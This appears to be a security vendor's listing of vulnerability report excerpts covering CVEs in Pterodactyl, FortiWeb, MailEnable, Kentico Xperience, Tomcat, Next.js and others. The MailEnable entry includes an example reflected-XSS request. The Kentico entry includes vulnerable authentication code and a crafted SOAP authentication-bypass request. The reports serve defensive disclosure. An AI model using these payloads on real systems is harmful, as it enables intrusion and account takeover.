North Korean-linked hackers conducted espionage operations for several months this spring, targeting diplomatic missions and abusing GitHub to distribute malware and covertly control infected systems. Another North Korean-run organization was also found to have infiltrated more than 320 companies worldwide by impersonating remote IT staff. Spear-phishing emails were sent to diplomatic missions and Ministry of Read more about [2025.08 Vulnerability Report] Kimsuky Group’s Use of GitHub C2 in Targeted Attacks Against Foreign Embassies in South Korea[…]

CVE-2025-49132 is a critical RCE vulnerability that allows information disclosure or code execution within the Pterodactyl Panel server without authentication. Attackers can steal configurations or take control of the server, making prompt patching extremely important. Our AIWAF product is developing detection patterns to address vulnerabilities identified within Pterodactyl and will continue to respond quickly to newly discovered vulnerabilities. 1. Overview Pterodactyl Panel is an open-source game server management panel designed to allow users to easily deploy and manage various game servers in a web-based environment. The panel leverages Docker and container-based architecture to ensure scalability and stability, while providing intuitive UI and fine-grained access control in multi-user environments. In both enterprise and community contexts, it is widely used for multi-game server operations, hosting automation, user management, and resource monitoring. This report summarizes the analysis of the recently identified unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2025-49132), discovered in versions prior to Pterodactyl Panel v1.11.11. Source : https://pterodactyl.io/ 2. Attack Type CVE-2025-49132 is a Remote Code Execution (RCE) vulnerability discovered in versions of Pterodactyl Panel prior to v1.11.11. The root cause of this vulnerability lies in authentication bypass and insufficient Read more about [2025.08 Vulnerability Report] Pterodactyl Panel Unauthenticated Remote Code Execution (CVE-2025-49132)[…]

This vulnerability is an SQL injection and remote code execution (RCE) vulnerability in Fortinet’s FortiWeb Fabric Connector, which allows attackers to exploit SQL injection attacks and malicious code execution by inserting malicious SQL injection syntax into the authentication header and sending requests. This vulnerability has been patched in each version of FortiWeb (7.0.11, 7.2.11, 7.4.8, 7.6.4), and AIWAF addresses it through related SQL injection patterns and its own functionality. 1. Overview Fortinet’s FortiWeb Fabric Connector is a system component that supports integration with FortiWeb web firewalls and other Fortinet products and features. This report summarizes our analysis of CVE-2025-25257, an SQL injection and RCE vulnerability that recently occurred in this component. Source : https://securityaffairs.com/179874/security/patch-immediately-cve-2025-25257-poc-enables-remote-code-execution-on-fortinet-fortiweb.html 2. Attack Type CVE-2025-25257 is an SQL injection vulnerability that exploits the fact that certain functions in Fortinet’s FortiWeb Fabric Connector use user input values as-is. By exploiting the fact that the get_fabric_user_by_token() function, used when attempting to connect to external Fortinet devices via the Fabric API, directly incorporates the Authorization Read more about [2025.07 Vulnerability Report] Fortinet FortiWeb Fabric Connector SQL Injection[…]

CVE-2025-26074 is a high-risk remote code execution (RCE) vulnerability that allows attackers to execute commands directly on the server without authentication, posing a serious security threat. In particular, if the attack code is inserted into the internal system operation workflow, it could lead to long-term backdoors and system control takeover, requiring immediate action. AIWAF products plan to develop patterns to address vulnerabilities occurring within Orkes and will respond swiftly to any vulnerabilities discovered in the future. 1. Overview Read more about [2025.07 Vulnerability Report] Remote Code Execution in Orkes Conductor OSS (CVE-2025-26074)[…]

2025.06 – Reflected Cross-Site Scripting in MailEnable (CVE-2025-44148) The CVE-2025-44148 vulnerability in MailEnable is a reflected cross-site scripting (XSS) vulnerability that occurs in the failure.aspx page of versions prior to v10. An attacker can execute the script in the user’s session by inserting JavaScript code through a malicious URL. This can lead to risks such as session hijacking, malicious script execution, and phishing attacks. In our AIWAF product, we are developing patterns to respond to vulnerabilities occurring in MailEnable, and we will respond quickly to vulnerabilities that are discovered in the future. 1. Overview MailEnable is mail server software used on Windows servers. It provides email sending and receiving capabilities, and supports POP3, SMTP, and IMAP protocols. It also allows email to be used in a browser through its webmail feature. In addition, it is responsible for providing spam protection, antivirus features, groupware features, and more. This report summarizes our recent analysis of Cross Site Scripting within MailEnable. Source : https://www.facebook.com/photo/?fbid=451757020309959&set=a.451756946976633 2. Attack type CVE-2025-44148 is a Cross-Site Scripting (XSS) vulnerability in the failure.aspx page of the MailEnable product. This vulnerability was found in MailEnable v10 and earlier, and could allow an attacker to inject a malicious script via a specially crafted URL, which could result in the script being executed in the user’s browser. For example, by sending a request to failure.aspx with a payload such as <script>alert(1)</script> in the msg parameter, an attacker could perform a variety of attacks, including hijacking a user’s session, executing malicious code, or phishing. The vulnerability is externally accessible without authentication and can affect web interfaces or cloud-based SaaS systems that use MailEnable. The risk is increased when client-side security policies (CSPs) are not in place, especially when API integrations or admin portals mirror user input.   Example attack Request :   GET /Mail/failure.aspx?msg=<script>alert(‘XSS’)</script> HTTP/1.1 Host: victim-domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close   3. Mitigation A separate patch for the CVE-2025-44148 vulnerability in MailEnable has not yet been released. The current patch recommendation is to upgrade to MailEnable v10 or later, which should be patched after version checking. In our AIWAF product, we are responding via the 114: Cross Site Scripting(14) pattern.   4. Conclusion The CVE-2025-44148 vulnerability in MailEnable is a reflexive cross-site scripting (XSS) vulnerability that occurs in the failure.aspx page in v10 and earlier versions of MailEnable. An attacker can inject JavaScript code via a malicious URL and execute that script in the user’s session. This can lead to session hijacking, malicious script execution, phishing attacks, and other risks. Our AIWAF product has developed patterns to respond to vulnerabilities within MailEnable, and we will continue to respond quickly to vulnerabilities as they are discovered.   5. References https://github.com/barisbaydur/CVE-2025-44148 https://nvd.nist.gov/vuln/detail/CVE-2025-44148

2025.06 – Kentico Xperience CMS Authentication Bypass The vulnerability is an authentication bypass vulnerability in the Kentico Xperience CMS platform, which could allow an attacker to attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx. The vulnerability was patched in Kentico Xperience CMS platform version 13.0.178, and AIWAF responded by adding patterns to detect these vulnerabilities in a May 2025 pattern update.   1. Overview Xperience CMS is a digital marketing platform provided by Kentico, which is an integrated system platform that includes content management services, digital marketing, e-commerce management, and more. This report summarizes our analysis of CVE-2025-2746 and CVE-2025-2747, the authentication bypass and RCE vulnerabilities recently discovered in the platform. Source : https://en.wikipedia.org/wiki/Kentico_Xperience   2. Attack type CVE-2025-2746 is an authentication bypass vulnerability that leverages a vulnerable authentication system in certain endpoints of Kentico’s Xperience CMS platform. According to watchtowr, who analyzed the vulnerability, an attacker can attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx, by exploiting the return of the password hash value as an empty string when an invalid username is entered during the authentication process. protected override string AuthenticateToken(UsernameToken token) { if (token == null) { throw new ArgumentNullException(“[WebServiceAuthorization.AuthenticateToken]: Missing username authentication token.”); } AbstractStockHelper<RequestStockHelper>.Add(“AUTH_PROCESSED”, true, false); string value = SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + “.CMSStagingServiceUsername”); string text = EncryptionHelper.DecryptData(SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + “.CMSStagingServicePassword”)); if (string.IsNullOrEmpty(text)) { throw new SecurityException(“[WebServiceAuthorization.AuthenticateToken]: Staging does not work with blank password. Set a password on the target server.”); } if (value == token.Username) { return StagingTaskRunner.GetSHA1Hash(text); } return “”; } Source : https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/   An attacker can bypass the authentication process by selecting the hash-based password verification mode, sending a SOAP request with a SHA1 hash code in the form of an empty string password, and, in conjunction with the vulnerability, leverage the internal API after authentication to attempt an RCE attack.   Example attack Request :   POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1 Host: www.test.com Content-Type: text/xml; charset=utf-8 Content-Length: 1095 SOAPAction: “<http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData>” <soap:Envelope xmlns:xsi=”<http://www.w3.org/2001/XMLSchema-instance>” xmlns:xsd=”<http://www.w3.org/2001/XMLSchema>” xmlns:soap=”<http://schemas.xmlsoap.org/soap/envelope/>”> <soap:Header> <wsse:Security xmlns:wsse=”<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd>” xmlns:wsu=”<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd>”> <wsse:UsernameToken> <wsse:Username>hacker</wsse:Username> <wsse:Password Type=”<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest>”>OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password> <wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce> <wsu:Created>2025-05-013T014:54:17Z</wsu:Created> </wsse:UsernameToken> </wsse:Security> </soap:Header> <soap:Body> <ProcessSynchronizationTaskData xmlns=”<http://localhost/SyncWebService/SyncServer>”> <stagingTaskData><![CDATA[<hacker>]]></stagingTaskData> Read more about [2025.06 Vulnerability Report] Kentico Xperience CMS Authentication Bypass[…]

[2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution This is an RCE vulnerability in the Ingress NGINX controller that could allow an attacker to attempt to execute malicious commands by sending an AdmissionReview request with a crafted, temporary NGINX configuration template. This vulnerability was patched in Ingress NGINX Controller versions 1.12.1, 1.11.5, and Read more about [2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution[…]

[2025.04 Vulnerability Report] FOXCMS Qianhu Remote Code Execution(CVE-2025-29306) CVE-2025-29306 is a vulnerability that can pose a serious security threat to organizations using FoxCMS. An attacker can exploit this vulnerability to gain complete control of the system, which can result in data leakage, service interruption, etc. Therefore, prompt patching and security enhancement measures are required for Read more about [2025.04 Vulnerability Report] FOXCMS Qianhu Remote Code Execution(CVE-2025-29306)[…]

[2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813) Apache Tomcat is a Java-based web application server widely used worldwide, and recently discovered a serious path equivalence vulnerability identified as CVE-2025-24813. This vulnerability poses a risk that an attacker can access restricted resources or execute arbitrary code without authentication due to a path validation error in Read more about [2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813)[…]

[2025.04 Vulnerability Report] Next.js Middleware Authentication Bypass The vulnerability is an authentication bypass vulnerability in Next.js, which allows an attacker to bypass access control for the API by sending the request by entering the middleware path in the x-middleware-request header or entering it to satisfy the recursive condition. The vulnerabilities were patched in Next.js versions Read more about [2025.04 Vulnerability Report] Next.js Middleware Authentication Bypass[…]